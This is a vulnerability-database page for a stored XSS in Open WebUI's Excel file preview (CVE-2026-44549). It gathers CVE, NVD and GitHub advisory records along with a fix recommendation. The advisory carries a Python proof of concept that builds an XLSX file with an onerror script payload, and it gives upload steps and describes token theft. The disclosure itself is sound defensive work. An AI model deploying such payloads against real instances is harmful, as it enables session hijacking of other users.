CVE-2026-44549 (GCVE-0-2026-44549)
Vulnerability from cvelistv5 – Published: 2026-05-15 21:45 – Updated: 2026-05-15 21:45
VLAI?
Title
Open WebUI: Stored XSS in excel file preview
Summary
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the sheetjs function sheet_to_html to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via @html causing the payload to trigger. This vulnerability is fixed in 0.8.0.
Severity ?
7.3 (High)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://github.com/open-webui/open-webui/security… | x_refsource_CONFIRM |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| open-webui | open-webui |
Affected:
< 0.8.0
|
{
"containers": {
"cna": {
"affected": [
{
"product": "open-webui",
"vendor": "open-webui",
"versions": [
{
"status": "affected",
"version": "\u003c 0.8.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the sheetjs function sheet_to_html to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via @html causing the payload to trigger. This vulnerability is fixed in 0.8.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-15T21:45:16.446Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc"
}
],
"source": {
"advisory": "GHSA-jwf8-pv5p-vhmc",
"discovery": "UNKNOWN"
},
"title": "Open WebUI: Stored XSS in excel file preview"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-44549",
"datePublished": "2026-05-15T21:45:16.446Z",
"dateReserved": "2026-05-06T20:59:00.594Z",
"dateUpdated": "2026-05-15T21:45:16.446Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-44549",
"date": "2026-05-17",
"epss": "0.00032",
"percentile": "0.09554"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-44549\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-15T22:16:52.490\",\"lastModified\":\"2026-05-15T22:16:52.490\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the sheetjs function sheet_to_html to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via @html causing the payload to trigger. This vulnerability is fixed in 0.8.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.1,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"references\":[{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc\",\"source\":\"security-advisories@github.com\"}]}}"
}
}
GHSA-JWF8-PV5P-VHMC
Vulnerability from github – Published: 2026-05-08 22:26 – Updated: 2026-05-08 22:26
VLAI?
Summary
Open WebUI has stored XSS in Excel file preview
Details
Summary
Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the sheetjs function sheet_to_html to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via @html causing the payload to trigger.
Details
The function used to convert XLSX documents to HTML for preview does not perform any input validation or sanitisation for the generated HTML
https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L120-L133
XLSX attachments are processed by this function, converted to HTML with XLSX.utils.sheet_to_html before ultimately being assigned to the variable excelHtml. Later there is logic that causes this to be assigned directly to the DOM when the preview tab is selected.
https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L358-L400
PoC
A python script to generate a payload file is as follows:
import xlsxwriter
payload = '<img src=x onerror="alert(\'XSS Triggered by XLSX file\')">'
workbook = xlsxwriter.Workbook('xss_payload.xlsx')
worksheet = workbook.add_worksheet()
payload_format = workbook.add_format()
worksheet.write_rich_string('A1',
'This cell contains a hidden payload: ',
payload_format, payload
)
worksheet.write('A2', 'This is a safe cell.')
worksheet.write('B1', 'Column B')
workbook.close()
Upload the generated file as an attachment to a chat, open the file modal, and click preview. Observe the XSS triggers.
This same process can be triggered in shared chats, allowing the payload to be distributed to victims.
Impact
Any user can create a weaponised chat that can be shared and subsequently used to target other users.
Low privilege users are at risk of having their session taken over by a payload that reads their token from local storage and exfiltrates it to an attacker controlled server.
Admins are at risk of exposing the server to RCE via same chain described in GHSA-w7xj-8fx7-wfch.
Caveats
The file attachment in the shared chat must be opened and previewed to trigger the vulnerability.
Recommendation
Sanitise the generated HTML with DOMPurify before assigning it to the DOM.
Severity ?
7.3 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.7.2"
},
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44549"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T22:26:17Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nExcel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the [sheetjs](https://git.sheetjs.com/sheetjs/sheetjs) function [sheet_to_html](https://git.sheetjs.com/sheetjs/sheetjs/src/commit/66cf8d2117d271f89e4f47b5fed35a3e1ea93f67/bits/79_html.js#L127) to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via [`@html`](https://svelte.dev/docs/svelte/@html) causing the payload to trigger.\n\n### Details\nThe function used to convert XLSX documents to HTML for preview does not perform any input validation or sanitisation for the generated HTML\nhttps://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L120-L133\nXLSX attachments are processed by this function, converted to HTML with `XLSX.utils.sheet_to_html` before ultimately being assigned to the variable `excelHtml`. Later there is logic that causes this to be assigned directly to the DOM when the preview tab is selected.\nhttps://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L358-L400\n\n### PoC\nA python script to generate a payload file is as follows:\n```python\nimport xlsxwriter \n \npayload = \u0027\u003cimg src=x onerror=\"alert(\\\u0027XSS Triggered by XLSX file\\\u0027)\"\u003e\u0027 \n \nworkbook = xlsxwriter.Workbook(\u0027xss_payload.xlsx\u0027) \nworksheet = workbook.add_worksheet() \n \npayload_format = workbook.add_format() \n \nworksheet.write_rich_string(\u0027A1\u0027, \n \u0027This cell contains a hidden payload: \u0027, \n payload_format, payload \n) \n \nworksheet.write(\u0027A2\u0027, \u0027This is a safe cell.\u0027) \nworksheet.write(\u0027B1\u0027, \u0027Column B\u0027) \n \nworkbook.close()\n```\n\nUpload the generated file as an attachment to a chat, open the file modal, and click preview. Observe the XSS triggers.\n\u003cimg width=\"2444\" height=\"1386\" alt=\"image\" src=\"https://github.com/user-attachments/assets/8400efb0-ea6f-4878-abdb-4c2fe529241f\" /\u003e\nThis same process can be triggered in shared chats, allowing the payload to be distributed to victims.\n\u003cimg width=\"2386\" height=\"1646\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d0eda49c-8fcf-4fc4-bbb0-c8951b0369c3\" /\u003e\n\n\n### Impact\nAny user can create a weaponised chat that can be shared and subsequently used to target other users.\n\nLow privilege users are at risk of having their session taken over by a payload that reads their token from local storage and exfiltrates it to an attacker controlled server.\n\nAdmins are at risk of exposing the server to RCE via same chain described in GHSA-w7xj-8fx7-wfch.\n\n### Caveats\nThe file attachment in the shared chat must be opened and previewed to trigger the vulnerability.\n\n### Recommendation\nSanitise the generated HTML with DOMPurify before assigning it to the DOM.",
"id": "GHSA-jwf8-pv5p-vhmc",
"modified": "2026-05-08T22:26:17Z",
"published": "2026-05-08T22:26:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI has stored XSS in Excel file preview"
}
FKIE_CVE-2026-44549
Vulnerability from fkie_nvd - Published: 2026-05-15 22:16 - Updated: 2026-05-15 22:16
Severity ?
Summary
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the sheetjs function sheet_to_html to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via @html causing the payload to trigger. This vulnerability is fixed in 0.8.0.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the sheetjs function sheet_to_html to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via @html causing the payload to trigger. This vulnerability is fixed in 0.8.0."
}
],
"id": "CVE-2026-44549",
"lastModified": "2026-05-15T22:16:52.490",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 5.2,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-15T22:16:52.490",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Received",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…